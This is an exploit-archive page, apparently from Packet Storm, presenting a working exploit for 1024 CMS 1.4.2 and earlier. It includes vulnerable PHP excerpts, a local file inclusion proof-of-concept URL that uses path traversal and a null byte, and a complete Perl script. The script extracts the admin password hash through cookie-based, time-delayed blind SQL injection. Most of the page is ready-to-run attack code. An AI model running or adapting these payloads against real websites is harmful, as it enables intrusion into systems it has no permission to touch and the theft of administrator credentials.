what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

1024cms-lfisql.txt

1024cms-lfisql.txt
Posted Apr 14, 2008
Authored by __GiReX__ | Site girex.altervista.org

1024 CMS versions 1.4.2 and below local file inclusion and blind SQL injection exploit.

tags | exploit, local, sql injection, file inclusion
SHA-256 | b2fe79895891927df1cdbbbf642362c31d9ed388dbbbf156c9b45ad606f8fcde

1024cms-lfisql.txt

Change Mirror Download
# Author:  __GiReX__
# mySite: girex.altervista.org
# Date: 13/04/2008

# CMS: 1024 CMS <= 1.4.1 and 1.4.2 (beta)
# Site: 1024cms.com

# Bug1: Local File Inclusion
# Need: magic_quotes_gpc = Off / register_globals = On

# Bug2: Cookie Blind SQL Injection
# Exploit: Admin Hash Retrieve Exploit
# Need: magic_quotes_gpc = Off


# Bug1: Vuln Code: pages/print/default/ops/news.php

<?php
if(!isset($_GET['id']) || !is_numeric($_GET['id'])) die("ID Not Set");
include("./lang/".$lang."/news/default.php");

# $lang is unset so we can exploit through local file inclusion


# Include a local file in CMS directory
# PoC: [host]/[path]/pages/print/default/ops/news.php?id=1&lang=../../../../../[local file]%00



# Bug2: Vuln Code: /includes/system.php: Lines 66-71

if(!isset($_SESSION['logged']) && (isset($_COOKIE['cookuid']) && isset($_COOKIE['cookpass']) &&
isset($_COOKIE['cooktype']) && isset($_COOKIE['cooklogged']))){
$_SESSION['logged'] = $_COOKIE['cooklogged'];
$_SESSION['user'] = $_COOKIE['cookuid'];
$_SESSION['type'] = $_COOKIE['cooktype'];

$chk_comb = mysql_query("SELECT id, type, warning, banned FROM ".$prefix."users
WHERE username='".$_SESSION['logged']."' AND password='".$_COOKIE['cookpass']."'")
or die("Cannot check combination: ".mysql_error());

# We can exploit this vulnerable query editing our cookies and making a blind sql injection


### Start Exploit ###

#!/usr/bin/perl -w
# 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection
# Admin Hash Retrieve Exploit

use LWP::UserAgent;
use HTTP::Request;

if(not defined $ARGV[0])
{
print "usage: perl $0 [host] [path]\n";
print "example: perl $0 localhost /1024/\n";
exit;
}

my $client = new LWP::UserAgent;
my @cset = (48..57, 97..102);
my $hash = undef;

my $host = ($ARGV[0] =~ /^http:\/\//) ? $ARGV[0]: 'http://' . $ARGV[0];
$host .= $ARGV[1] unless not defined $ARGV[1];

banner();
check_vuln($host) or die "[-] Site not vulnerable: maybe magic_quotes_gpc = On\n\n";
syswrite(STDOUT, "[+] Admin Hash: ");

for($j = 1; $j <= 32; $j++)
{
for($i = 0; $i <= $#cset; $i++)
{
$pre_time = time();

$rv = check_char($cset[$i], $j);
$post_time = time();

if($post_time - $pre_time > 3 and $rv)
{
$hash .= chr($cset[$i]);
syswrite(STDOUT, chr($cset[$i]), 1);
last;
}
}
}

if(not defined $hash or length($hash) != 32)
{
print STDOUT "\n[-] Exploit mistake: please check the benchmark and the sql query\n\n";
}
else
{
print STDOUT "\n[+] Exploit terminated\n\n";
}


sub banner
{
print "\n";
print "[+] 1024 CMS <= 1.4.2 (beta) Remote Blind SQL Injection\n";
print "[+] Admin Hash Retrieve Exploit\n";
print "[+] Coded by __GiReX__\n";
print "\n";
}

sub check_vuln
{
my $target = shift;

$get = new HTTP::Request(GET, $target);
$get->header(Cookie => "cookpass=-1'; cookuid=0; cooktype=0; cooklogged=0; cookuser=0");

$res = $client->request($get);

if($res->is_success)
{
return 1 if $res->as_string =~ /Cannot check combination/;
}
else
{
die "[-] Invalid target : ${target}\n\n";
}

return 0;
}

sub check_char
{
my ($char, $n) = @_;

$get->header(Cookie => 'cookpass=-1\'+AND+'.
'CASE+WHEN(SELECT ASCII(SUBSTRING(password,'.$n.',1))+'.
'FROM+otatf_users+WHERE+id=1)='.$char.'+'.
'THEN+BENCHMARK(90000000,CHAR(0))+END#; '.
'cookuid=1; cooktype=1; cooklogged=1; cookuser=1');

$res = $client->request($get);

return $res->is_success;
}
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close